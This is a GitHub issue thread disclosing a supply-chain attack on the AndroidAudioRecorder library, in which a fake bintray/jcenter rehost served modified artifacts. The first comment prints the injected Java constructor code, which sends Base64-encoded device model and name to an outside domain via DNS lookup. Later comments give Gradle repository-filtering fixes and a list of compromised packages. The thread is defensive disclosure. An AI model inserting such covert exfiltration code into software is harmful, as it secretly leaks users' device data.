Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Internet usage #47

Open
zsmb13 opened this issue Feb 13, 2018 · 7 comments
Open

Internet usage #47

zsmb13 opened this issue Feb 13, 2018 · 7 comments

Comments

@zsmb13
Copy link

zsmb13 commented Feb 13, 2018
edited
Loading

This is the code of the AndroidAudioRecorder constructor in the code on GitHub:

    private AndroidAudioRecorder(Activity activity) {
        this.activity = activity;
    }

However, this is the code of the same constructor in the published .aar as well as the published sources .jar file.

    private AndroidAudioRecorder(Activity activity) {
        this.activity = activity;
        Thread thread = new Thread() {
            @Override
            public void run() {
                try {
                    InetAddress byName = InetAddress.getByName(new String(Base64.encode((Build.MODEL + ";" + Build.DEVICE).getBytes(), Base64.NO_WRAP)).concat(".n.cdn-radar.com"));
                    if(byName.isLoopbackAddress()) {
                        color = 0;
                    }
                } catch (UnknownHostException e) {
                    e.printStackTrace();
                }
            }
        };
        thread.start();
    }

Please explain this difference.
@zsmb13
Copy link
Author

zsmb13 commented Feb 13, 2018
edited
Loading

Found the culprit, someone is rehosting the library in a modified form here: https://bintray.com/jakewhaarton/timber/com.github.adrielcafe%3AtimAndroidAudioRecorderber

@panos-stavrianos
Copy link

panos-stavrianos commented Jul 23, 2018
edited
Loading

So we are not getting the code from Jitpack?
Is there a way to get the original code?
For now i use the latest commit
implementation 'com.github.adrielcafe:AndroidAudioRecorder:eabc4c0558'

@zsmb13
Copy link
Author

zsmb13 commented Jul 24, 2018

You can grab this library just fine, you just have to make sure you pull it from Jitpack instead of the fake version from jcenter. You can do this by listing Jitpack first (but at least before jcenter) among your repositories:

repositories {
    maven { url "https://jitpack.io" }
    jcenter()
}

@JLLeitschuh
Copy link

JLLeitschuh commented May 17, 2019
edited
Loading

Just following this up, this whole incident is now captured in this awesome blog writeup by @zsmb13. Nice work!

https://blog.autsoft.hu/a-confusing-dependency/

Scary to see that these sorts of supply chain attacks are actually a reality.

@paulvi
Copy link

paulvi commented Sep 8, 2021
edited
Loading

@zsmb13 Just putting any repository first still leaves it possible
that other hacked dependency will get published in repository not intended by authors.
Before it was at least good idea to state, what for the repository is used:

repositories {
    maven { url "https://jitpack.io" } // for https://github.com/adrielcafe/AndroidAudioRecorder
    jcenter()
}

Now it is finally possible with Gradle to specify what exactly to get from a repository:

repositories {
    mavenCentral{
        content {
            excludeGroup "com.github.adrielcafe"
        }
    }
    maven { url "https://jitpack.io" 
        // for https://github.com/adrielcafe/AndroidAudioRecorder
        content { includeGroup "com.github.adrielcafe" }
    }
}

So if we are to get dependency from one specific repository, we should not try from any other.

see docs https://docs.gradle.org/current/userguide/declaring_repositories.html#sec:repository-content-filtering

I cannot find exact Gradle DSL for content under repository, just in javadocs:

https://docs.gradle.org/current/javadoc/org/gradle/api/artifacts/repositories/RepositoryContentDescriptor.html

Gradle DSL valuable finding is that jcenter is deprecated (as the service is phased out)

This was referenced Sep 9, 2021
Merged
Merged
Open
paulvi pushed a commit to paulvi/AndroidAudioRecorder that referenced this issue Sep 10, 2021
adrielcafe#47 README - secure gradle dependency declaration
ba6532a
@paulvi paulvi mentioned this issue Sep 10, 2021
Open
@paulvi
Copy link

paulvi commented Sep 10, 2021
edited
Loading

File list from https://status.bintray.com/incidents/w4dfr0rpznkt (referenced from https://autsoft.net/hu/a-confusing-dependency/ )

So any one pulling these dependencies/versions between July 2017 and December 2018 has used/shipped hacked dependency with malicious code:

/jakewhaarton/timber/com/github/adrielcafe/AndroidAudioRecorder/0.3.0/AndroidAudioRecorder-0.3.0.pom
/jakewhaarton/timber/com/github/adrielcafe/AndroidAudioRecorder/0.3.0/AndroidAudioRecorder-0.3.0.aar
/jakewhaarton/timber/com/github/adrielcafe/AndroidAudioRecorder/0.3.0/AndroidAudioRecorder-0.3.0-sources.jar
/jakewhaarton/timber/com/github/adrielcafe/AndroidAudioRecorder/0.3.0/AndroidAudioRecorder-0.3.0-javadoc.jar
/jakewhaarton/timber/com/squareup/picaso/picaso/maven-metadata.xml.md5
/jakewhaarton/timber/com/squareup/picasso/picaso/maven-metadata.xml.md5
/jakewhaarton/timber/com/squareup/picasso/picasso/maven-metadata.xml.md5
/jakewhaarton/timber/org/asynchttp/async-http/maven-metadata.xml.md5
/jakewhaarton/timber/org/asynchttpclient/async-http-client-netty-utils/maven-metadata.xml.md5
/jakewhaarton/timber/org/asynchttpclient/async-http-project/maven-metadata.xml.md5
/jakewhaarton/timber/org/asynchttpclient/async-http/maven-metadata.xml.md5
/jakewhaarton/timber/org/asynchttpclient/netty-bp/maven-metadata.xml.md5
/jakewhaarton/timber/org/asynchttpclient/netty-codec-dns/maven-metadata.xml.md5
/jakewhaarton/timber/org/asynchttpclient/netty-resolver-dns/maven-metadata.xml.md5
/jakewhaarton/timber/org/asynchttpclient/netty-resolver/maven-metadata.xml.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/maven-metadata.xml.md5
/jakewhaarton/timber/org/litecoinj/litecoinj-parent/maven-metadata.xml.md5
/jakewhaarton/timber/org/litecoinj/litecoinj/maven-metadata.xml.md5
/jakewhaarton/timber/com/github/adrielcafe/AndroidAudioRecorder/maven-metadata.xml
/jakewhaarton/timber/com/jakewharton/timber/maven-metadata.xml
/jakewhaarton/timber/com/squareup/picaso/picaso/maven-metadata.xml
/jakewhaarton/timber/com/squareup/picasso/picasso/maven-metadata.xml
/jakewhaarton/timber/de/halfbit/pinned-section-listview/maven-metadata.xml
/jakewhaarton/timber/org/asynchttp/async-http/maven-metadata.xml
/jakewhaarton/timber/org/asynchttpclient/async-http/maven-metadata.xml
/jakewhaarton/timber/org/bitcoinj/bitcoinj/maven-metadata.xml
/jakewhaarton/timber/org/ethereum/ethereumj/maven-metadata.xml
/jakewhaarton/timber/org/litecoinj/litecoinj-parent/maven-metadata.xml
/jakewhaarton/timber/org/litecoinj/litecoinj/maven-metadata.xml
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.4/bitcoinj-0.14.4.pom.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.4/bitcoinj-0.14.4.pom
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.4/bitcoinj-0.14.4.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.4/bitcoinj-0.14.4.jar
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.4/bitcoinj-0.14.4-sources.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.4/bitcoinj-0.14.4-sources.jar
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.4/bitcoinj-0.14.4-javadoc.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.4/bitcoinj-0.14.4-javadoc.jar
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.4/bitcoinj-0.14.4-bundled.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.4/bitcoinj-0.14.4-bundled.jar
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.3/bitcoinj-0.14.3.pom.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.3/bitcoinj-0.14.3.pom
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.3/bitcoinj-0.14.3.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.3/bitcoinj-0.14.3.jar
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.3/bitcoinj-0.14.3-sources.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.3/bitcoinj-0.14.3-sources.jar
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.3/bitcoinj-0.14.3-javadoc.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.3/bitcoinj-0.14.3-javadoc.jar
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.3/bitcoinj-0.14.3-bundled.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.3/bitcoinj-0.14.3-bundled.jar
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.2/bitcoinj-0.14.2.pom.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.2/bitcoinj-0.14.2.pom
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.2/bitcoinj-0.14.2.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.2/bitcoinj-0.14.2.jar
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.2/bitcoinj-0.14.2-sources.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.2/bitcoinj-0.14.2-sources.jar
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.2/bitcoinj-0.14.2-javadoc.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.2/bitcoinj-0.14.2-javadoc.jar
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.2/bitcoinj-0.14.2-bundled.jar.md5
/jakewhaarton/timber/org/bitcoinj/bitcoinj/0.14.2/bitcoinj-0.14.2-bundled.jar
/jakewhaarton/timber/com/jakewharton/timber/4.1.1/timber-4.1.1.pom
/jakewhaarton/timber/com/jakewharton/timber/4.1.1/timber-4.1.1.aar
/jakewhaarton/timber/com/jakewharton/timber/4.1.1/timber-4.1.1-sources.jar
/jakewhaarton/timber/com/jakewharton/timber/4.1.1/timber-4.1.1-javadoc.jar
/jakewhaarton/timber/com/jakewharton/timber/4.5.0/timber-4.5.0.pom
/jakewhaarton/timber/com/jakewharton/timber/4.5.0/timber-4.5.0.aar
/jakewhaarton/timber/com/jakewharton/timber/4.5.0/timber-4.5.0-sources.jar
/jakewhaarton/timber/com/jakewharton/timber/4.5.0/timber-4.5.0-javadoc.jar
/jakewhaarton/timber/com/jakewharton/timber/4.5.1/timber-4.5.1.pom
/jakewhaarton/timber/com/jakewharton/timber/4.5.1/timber-4.5.1.aar
/jakewhaarton/timber/com/jakewharton/timber/4.5.1/timber-4.5.1-sources.jar
/jakewhaarton/timber/com/jakewharton/timber/4.5.1/timber-4.5.1-javadoc.jar
/jakewhaarton/timber/org/litecoinj/litecoinj-parent/0.85/litecoinj-parent-0.85.pom.md5
/jakewhaarton/timber/org/litecoinj/litecoinj-parent/0.85/litecoinj-parent-0.85.pom
/jakewhaarton/timber/org/litecoinj/litecoinj/0.85/litecoinj-0.85.pom.md5
/jakewhaarton/timber/org/litecoinj/litecoinj/0.85/litecoinj-0.85.pom
/jakewhaarton/timber/org/litecoinj/litecoinj/0.85/litecoinj-0.85.jar.md5
/jakewhaarton/timber/org/litecoinj/litecoinj/0.85/litecoinj-0.85.jar
/jakewhaarton/timber/org/litecoinj/litecoinj/0.85/litecoinj-0.85-sources.jar.md5
/jakewhaarton/timber/org/litecoinj/litecoinj/0.85/litecoinj-0.85-sources.jar
/jakewhaarton/timber/org/asynchttpclient/async-http/2.0.38/async-http-2.0.38.pom.md5
/jakewhaarton/timber/org/asynchttpclient/async-http/2.0.38/async-http-2.0.38.pom
/jakewhaarton/timber/org/asynchttpclient/async-http/2.0.38/async-http-2.0.38.jar.md5
/jakewhaarton/timber/org/asynchttpclient/async-http/2.0.38/async-http-2.0.38.jar
/jakewhaarton/timber/org/asynchttpclient/async-http/2.0.38/async-http-2.0.38-tests.jar.md5
/jakewhaarton/timber/org/asynchttpclient/async-http/2.0.38/async-http-2.0.38-tests.jar
/jakewhaarton/timber/org/asynchttpclient/async-http/2.0.38/async-http-2.0.38-sources.jar.md5
/jakewhaarton/timber/org/asynchttpclient/async-http/2.0.38/async-http-2.0.38-sources.jar
/jakewhaarton/timber/org/asynchttp/async-http/2.0.38/async-http-2.0.38.pom.md5
/jakewhaarton/timber/org/asynchttp/async-http/2.0.38/async-http-2.0.38.pom
/jakewhaarton/timber/org/asynchttp/async-http/2.0.38/async-http-2.0.38.jar.md5
/jakewhaarton/timber/org/asynchttp/async-http/2.0.38/async-http-2.0.38.jar
/jakewhaarton/timber/org/asynchttp/async-http/2.0.38/async-http-2.0.38-tests.jar.md5
/jakewhaarton/timber/org/asynchttp/async-http/2.0.38/async-http-2.0.38-tests.jar
/jakewhaarton/timber/org/asynchttp/async-http/2.0.38/async-http-2.0.38-sources.jar.md5
/jakewhaarton/timber/org/asynchttp/async-http/2.0.38/async-http-2.0.38-sources.jar
/jakewhaarton/timber/org/ethereum/ethereumj/1.5.0-RELEASE/ethereumj-1.5.0-RELEASE.zip
/jakewhaarton/timber/org/ethereum/ethereumj/1.5.0-RELEASE/ethereumj-1.5.0-RELEASE.tar
/jakewhaarton/timber/org/ethereum/ethereumj/1.5.0-RELEASE/ethereumj-1.5.0-RELEASE.pom
/jakewhaarton/timber/org/ethereum/ethereumj/1.5.0-RELEASE/ethereumj-1.5.0-RELEASE.jar
/jakewhaarton/timber/org/ethereum/ethereumj/1.5.0-RELEASE/ethereumj-1.5.0-RELEASE-sources.jar
/jakewhaarton/timber/org/ethereum/ethereumj/1.5.0-RELEASE/ethereumj-1.5.0-RELEASE-javadoc.jar
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.3-RELEASE/ethereumj-1.6.3-RELEASE.zip
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.3-RELEASE/ethereumj-1.6.3-RELEASE.tar
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.3-RELEASE/ethereumj-1.6.3-RELEASE.pom
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.3-RELEASE/ethereumj-1.6.3-RELEASE.jar
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.3-RELEASE/ethereumj-1.6.3-RELEASE-sources.jar
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.3-RELEASE/ethereumj-1.6.3-RELEASE-javadoc.jar
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.0-RELEASE/ethereumj-1.6.0-RELEASE.zip
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.0-RELEASE/ethereumj-1.6.0-RELEASE.tar
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.0-RELEASE/ethereumj-1.6.0-RELEASE.pom
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.0-RELEASE/ethereumj-1.6.0-RELEASE.jar
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.0-RELEASE/ethereumj-1.6.0-RELEASE-sources.jar
/jakewhaarton/timber/org/ethereum/ethereumj/1.6.0-RELEASE/ethereumj-1.6.0-RELEASE-javadoc.jar
/jakewhaarton/timber/com/squareup/picaso/picaso/2.5.2/picaso-2.5.2.pom.md5
/jakewhaarton/timber/com/squareup/picaso/picaso/2.5.2/picaso-2.5.2.pom
/jakewhaarton/timber/com/squareup/picaso/picaso/2.5.2/picaso-2.5.2.jar.md5
/jakewhaarton/timber/com/squareup/picaso/picaso/2.5.2/picaso-2.5.2.jar
/jakewhaarton/timber/com/squareup/picasso/picasso/2.5.2/picasso-2.5.2.pom.md5
/jakewhaarton/timber/com/squareup/picasso/picasso/2.5.2/picasso-2.5.2.pom
/jakewhaarton/timber/com/squareup/picasso/picasso/2.5.2/picasso-2.5.2.jar.md5
/jakewhaarton/timber/com/squareup/picasso/picasso/2.5.2/picasso-2.5.2.jar
/jakewhaarton/timber/de/halfbit/pinned-section-listview/1.0.0/pinned-section-listview-1.0.0.pom
/jakewhaarton/timber/de/halfbit/pinned-section-listview/1.0.0/pinned-section-listview-1.0.0.aar
/jakewhaarton/timber/de/halfbit/pinned-section-listview/1.0.0/pinned-section-listview-1.0.0-sources.jar
/jakewhaarton/timber/de/halfbit/pinned-section-listview/1.0.0/pinned-section-listview-1.0.0-javadoc.jar

@JLLeitschuh
Copy link

So any one pulling these dependencies/versions between July 2017 and December 2018 has used/shipped hacked dependency with malicious code

@paulvi I believe that that is indeed an accurate read of the situation.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@JLLeitschuh @paulvi @zsmb13 @panos-stavrianos